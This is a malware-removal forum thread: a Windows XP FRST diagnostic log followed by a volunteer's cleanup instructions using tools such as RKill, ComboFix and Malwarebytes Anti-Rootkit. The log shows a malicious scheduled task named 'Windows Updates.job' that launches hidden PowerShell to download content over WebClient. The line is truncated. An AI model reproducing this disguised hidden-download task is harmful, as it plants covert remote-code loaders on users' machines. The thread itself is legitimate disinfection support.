CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{EE469827-4ED9-443B-9FB0-EFA81FEA6646}\InprocServer32 -> C:\Program Files\palmOne\Components\DelDups.dll ( palmOne, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{F0905939-16C0-4D2E-8F4F-73A4BEDEBE73}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{F1523FBD-0E09-4E8F-A952-B053B118FAAE}\InprocServer32 -> C:\Program Files\palmOne\PSDConduit.dll (PalmSource, Inc)
CustomCLSID: HKU\S-1-5-21-1202660629-1592454029-1801674531-1003_Classes\CLSID\{F21AC7C7-D6F5-11D6-8306-00C04FA03755}\InprocServer32 -> C:\Program Files\palmOne\PRouter.dll (palmOne, Inc.)

==================== Restore Points  =========================

05-03-2015 22:20:00 System Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2008-04-13 18:00 - 2015-03-07 19:03 - 00000135 ____R C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1    localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\At1.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At2.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At3.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At4.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\WINDOWS\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: C:\WINDOWS\Tasks\Windows Updates.job => C:\Windows\system32\windowspowershell\v1.0\powershell.exeË-windowstyle hidden -noninteractive -command $a = New-Object System.Net.WebClient; $b = $a.Dow

==================== Loaded Modules (whitelisted) ==============

2015-03-07 17:15 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2015-03-07 17:15 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2015-03-07 17:15 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2015-03-07 17:15 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2015-03-07 17:15 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2014-08-25 10:36 - 2001-07-03 08:17 - 00024576 _____ () C:\Program Files\Hewlett-Packard\HP Share-to-Web\HPGS2WNFPS.DLL
2014-08-25 10:36 - 2001-07-03 08:17 - 00065536 _____ () C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnf.exe

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventSystem => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ioloSystemService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventSystem => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ioloSystemService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1202660629-1592454029-1801674531-1003\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-1202660629-1592454029-1801674531-500\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Bliss.bmp
DNS Servers: 8.8.8.8

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe"
MSCONFIG\startupreg: MSN Toolbar => "C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\mswinext.exe"
MSCONFIG\startupreg: ToolboxFX => "C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe" /enum:on /alerts:on /notifications:on /fl:on /fr:on /appData:on /tmcp:on

==================== Accounts: =============================

Administrator (S-1-5-21-1202660629-1592454029-1801674531-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
Guest (S-1-5-21-1202660629-1592454029-1801674531-501 - Limited - Disabled)
HelpAssistant (S-1-5-21-1202660629-1592454029-1801674531-1000 - Limited - Disabled)
Maureen (S-1-5-21-1202660629-1592454029-1801674531-1003 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Maureen
SUPPORT_388945a0 (S-1-5-21-1202660629-1592454029-1801674531-1002 - Limited - Disabled)

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================

System errors:
=============
Error: (03/07/2015 06:11:59 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Timeout (30000 milliseconds) waiting for the Spybot-S&D 2 Security Center Service service to connect.

Error: (03/07/2015 06:11:59 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Proxy Service service depends on the following nonexistent service: MfeFire

Error: (03/07/2015 06:11:59 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Personal Firewall Service service depends on the following nonexistent service: MfeFire

Error: (03/07/2015 06:11:59 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Home Network service depends on the following nonexistent service: MfeFire

Error: (03/07/2015 05:10:50 PM) (Source: DCOM) (EventID: 10024) (User: )
Description: The machine wide group policy Access Limits security descriptor is invalid. The security descriptor is defined as an invalid Security Descriptor Definitions Language (SDDL) string. The requested action was therefore not performed. Please contact your administrator to get the security descriptor corrected in the Group Policy settings.

Error: (03/07/2015 05:09:29 PM) (Source: DCOM) (EventID: 10024) (User: )
Description: The machine wide group policy Access Limits security descriptor is invalid. The security descriptor is defined as an invalid Security Descriptor Definitions Language (SDDL) string. The requested action was therefore not performed. Please contact your administrator to get the security descriptor corrected in the Group Policy settings.

Error: (03/07/2015 05:08:18 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Proxy Service service depends on the following nonexistent service: MfeFire

Error: (03/07/2015 05:08:18 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Personal Firewall Service service depends on the following nonexistent service: MfeFire

Error: (03/07/2015 05:08:18 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Home Network service depends on the following nonexistent service: MfeFire

Error: (03/07/2015 04:34:00 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "%%1058" attempting to start the service BITS with arguments ""
in order to run the server:
{4991D34B-80A1-4291-83B6-3328366B9097}


Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU E7200 @ 2.53GHz
Percentage of memory in use: 27%
Total physical RAM: 2037.1 MB
Available physical RAM: 1486.71 MB
Total Pagefile: 3929.66 MB
Available Pagefile: 3447.52 MB
Total Virtual: 2047.88 MB
Available Virtual: 1938.77 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.75 GB) (Free:398.24 GB) NTFS ==>[Drive with boot components (Windows XP)]
Drive d: (HBCD 15.2) (CDROM) (Total:0.58 GB) (Free:0 GB) CDFS
Drive e: (2GB MSD) (Removable) (Total:1.88 GB) (Free:1.69 GB) FAT

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 465.8 GB) (Disk ID: F40EF40E)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 1.9 GB) (Disk ID: E0AE33E8)
Partition 1: (Not Active) - (Size=1.9 GB) - (Type=06)

==================== End Of Log ============================

Link to post
Share on other sites

Hello and welome,

 

P2P/Piracy Warning:

 

 

If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here.Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.If you have illegal/cracked software, cracks, keygens etc. on the system, please remove or uninstall them now and read the policy on Piracy.

 

 

Next,

 

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.

NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

 

Run FRST and press the Fix button just once and wait.

The tool will make a log on the Desktop (Fixlog.txt) or the folder it was ran from. Please post it to your reply.

 

Next,

 

Right click on Malwarebytes icon on tray, select "exit" to close out, this must be done for the next tool to run...

 

Next,

 

1.Download Malwarebytes Anti-Rootkit from this link:

 

 http://www.malwarebytes.org/products/mbar/

 

2. Unzip the File to a convenient location. (Recommend the Desktop)

3. Open the folder where the contents were unzipped to run mbar.exe

 

Image1.png

 

4. Double-click on the mbar.exe file, you may receive a User Account Control prompt asking if you are sure you wish to allow the program to run. Please allow the program to run and MBAR will now start to install any necessary drivers that are required for the program to operate correctly. If a rootkit is interfering with the installation of the drivers you will see a message that states that the DDA driver was not installed and that you should reboot your computer to install it. You will see this image:

 

mbarwm.png

 

5. If you receive this message, please click on the Yes button and Malwarebytes Anti-Rootkit will now restart your computer. Once the computer is rebooted and you login, MBAR will automatically start and you will now be at the start screen. (If no Rootkit warning you will go from step 4 to 6.)

 

6. The following image opens, select Next.

 

Image2.png

 

7. The following image opens, select Update

 

Image3.png

 

8. When the update completes select Next.

 

Image4.png

 

9. In the following window ensure "Targets" are ticked. Then select "Scan"

 

Image5.png

 

10. If an infection is found select the "Cleanup Button" to remove threats, Reboot if prompted. Wait while the system shuts down and the cleanup process is performed.

 

MBAntiRKcleanA.png

 

11. Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click "Cleanup Button" once more and repeat the process.

12. If no threats were found you will see the following image, Select Exit:

 

Image6.png

 

13. Verify that your system is now running normally, making sure that the following items are functional:

 


      Internet access
      Windows Update
      Windows Firewall

 

14.  If there are additional problems with your system, such as any of those listed above or other system issues, then run the 'fixdamage' tool included within Malwarebytes Anti-Rootkit folder.

 

15. Select "Y" from your Keyboard, tap Enter.

 

16. The fix will be applied, select any key to Exit.

 

17. Let me know how your system now responds. Copy and paste the two following logs from the mbar folder:

 

System - log

Mbar - log   Date and time of scan will also be shown

 

Thanks,

 

Kevin...

 

 

 

Fixlist.txt

Link to post
Share on other sites

Download RKill from here: http://www.bleepingcomputer.com/download/rkill/

 

There are three buttons to choose from with different names on, select the first one and save it to your desktop.

 


Double-click on the Rkill desktop icon to run the tool.
If using Vista or Windows 7/8, right-click on it and Run As Administrator.
A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
A log pops up at the end of the run. This log file is located at C:\rkill.log. Please post this in your next reply.
If you do not see the black box flash on the screen delete the icon from the desktop and go back to the link for the download, select the next button and try to run the tool again, continue to repeat this process using the remaining buttons until the tool runs. You will find further links if you scroll down the page with other names, try them one at a time.
If the tool does not run from any of the links provided, please let me know.

 

Next,

 

Read the following link before we continue and run Combofix:

ComboFix usage, Questions, Help? - Look here

Next,

Download Combofix from either of the following links :-

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

http://www.infospyware.net/antimalware/combofix/

  • Ensure that Combofix is saved directly to the Desktop <--- Very important
  • Disable all security programs as they will have a negative effect on Combofix, instructions available here  http://www.bleepingcomputer.com/forums/topic114351.html if required. Be aware the list may not have all programs listed, if you need more help please ask.
  • Close any open browsers and any other programs you might have running
  • Double click the combofix.gif icon to run the tool (Vista or Windows 7 users right click and select "Run as Administrator)
  • Instructions for running Combofix available here http://www.bleepingcomputer.com/combofix/how-to-use-combofix if required.
  • If you are using windows XP It might display a pop up saying that "Recovery console is not installed, do you want to install?" Please select yes & let it download the files it needs to do this. Once the recovery console is installed Combofix will then offer to scan for malware. Select continue or yes.
  • When finished, it will produce a report for you. Please post the "C:\ComboFix.txt" for further review



****Note: Do not mouseclick combofix's window while it's running. That may cause it to stall or freeze ****

Note: ComboFix may reset a number of Internet Explorer's settings, including making it the default browser.
Note: Combofix prevents autorun of ALL CDs, floppies and USB devices to assist with malware removal & increase security. If this is an issue or makes it difficult for you -- please tell us when you reply. Read here  http://thespykiller.co.uk/index.php?page=20 why  disabling autoruns is recommended.

*EXTRA NOTES*


  •    
  • If Combofix detects any Rootkit/Bootkit activity on your system it will give a warning and prompt for a reboot, you must allow it to do so.
       
  • If Combofix reboot's due to a rootkit, the screen may stay black for several minutes on reboot, this is normal
       
  • If after running Combofix you receive any type of warning message about registry key's being listed for deletion when trying to open certain items, reboot the system and this will fix the issue (Those items will not be deleted)



Post the log in next reply please...

Kevin
 

Link to post
Share on other sites

That you again for your reply, and sorry for my slow responses. It's been a stressful past few days.

 

Attached is the RKill log. ComboFix says that McAfee is still running on the machine, but there is no system tray icon nor does the management interface work. I don't see any processes relating to it in Task Manager either, so I don't think it's actually running, but if it is, I have no way to shut it off.

Rkill.txt

Link to post
Share on other sites

I don't believe McAfee is running despite what ComboFix says, so I gave it a run anyway. The log is attached.

 

McAfee's firewall has always been disabled and Windows Firewall has running in its place from the start. Explorer remains sluggish and still spawns the aforementioned processes.

 

log.txt

Link to post
Share on other sites

Continue please:

 

Open Malwarebytes Anti-Malware, from the Dashboard please Check for Updates by clicking the Update Now... link

When the update completes select > Settings > Detection and Protection > Enable Scan for rootkit and Under Non Malware Protection set both PUP and PUM to Treat detections as malware.

 

 

Click on the SCAN button and run a Threat Scan with Malwarebytes Anti-Malware by clicking the Scan Now>> button.

 

When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.

 

 

In most cases, a restart will be required.

 

 

Wait for the prompt to restart the computer to appear, then click on Yes.

 

 

When the scan is completed from the main GUI click on History > Application Logs. Find your Scan log, the date when run will identify it. Checkmark "select" box > then hit the "view" button. The history log window will open. At the bottom of that window are two options, "Copy to clipboard" and "Export"

Select > "Copy to clipboard" that copies the full log to the windows clipboard, so at your reply you right click into the text field and select "Paste" the log is pasted (copied) to  your reply.

 

Next,

 

Download Microsoft's " Malicious Software Removal Tool" and save direct to the desktop

Ensure to get the correct version for your system....

32 Bit version:

https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en

64 Bit version:

https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=en'>https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=en

 

Right click on the Tool, select “Run as Administrator” the tool will expand to the options Window

In the "Scan Type" window, select Quick Scan

Perform a scan and  Click Finish when the scan is done.

Retrieve the MSRT log as follows, and post it in your next reply:

 

1) Select the Windows key and R key together to open the "Run" function

2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

 

notepad c:\windows\debug\mrt.log

 

Next,

 

Run FRST one more time, ensure all boxes are checkmarked under "Whitelist" but only checkmark Addition.txt under "Optional scan"

Post the two produced logs...

 

Thank you,

 

Kevin...

Link to post
Share on other sites

Thanks for the logs, run the following:

 

Download AdwCleaner by Xplode onto your Desktop.


Double click on Adwcleaner.exe to run the tool.
Click on Scan
Once the scan is done, click on the Clean button. <<<--- Ensure this option is completed
You will get a prompt asking to close all programs. Click OK.
Click OK again to reboot your computer.
A text file will open after the restart. Please post the content of that logfile in your reply.
You can also find the logfile at C:\AdwCleaner[sn].txt. Where n in the scan reference number

 

Next,

 

thisisujrt.gif Please download Junkware Removal Tool to your desktop.


Shut down your protection software now to avoid potential conflicts. (re-enable when done)
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.

 

Next,

 

Download Portable Windows Repair (all in one) from one of the following:

 

http://www.tweaking.com/content/page/windows_repair_all_in_one.html

http://www.majorgeeks.com/Tweaking.com_-_Windows_Repair_Portable_d7222.html

http://www.bleepingcomputer.com/download/windows-repair-all-in-one-portable/

 

Unzip the contents into a newly created folder on your desktop.

 

Open the folder, run the tool by right click on Repair_Windows (icon with red briefcase) select "Run as Administrator"

 

 

tweak1.jpg

 

From the main GUI do the following:

 

 

Select Tab 5 and Create System Restore Point

 

 

tweak4.jpg

 

Select Repairs tab => Click the Open repairs tab

 

 

tweak5.jpg

 

The repairs window will open, Check the boxes as indicated, also the "Restart" option, then select Start...

 

 

tweak6.jpg

 

DON'T use the computer while each scan is in progress.

 

Post the log, to access select "settings" tab > "open log folder" tab, log will be named _Windows_Repair_Log

 

 

tweak7.jpg

 

Post those logs and give an update on any remaining issues or concerns...

 

Thanks,

 

Kevin

Link to post
Share on other sites

Sorry, but the powers that be have decided to just junk the machine and replace it with something from this decade. Their files are destroyed anyway, so they've decided that this would be a good time to refresh everything. Thank you very much for your support, and I'm sorry for wasting your time.

Link to post
Share on other sites

  • 2 months later...
  • Root Admin

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.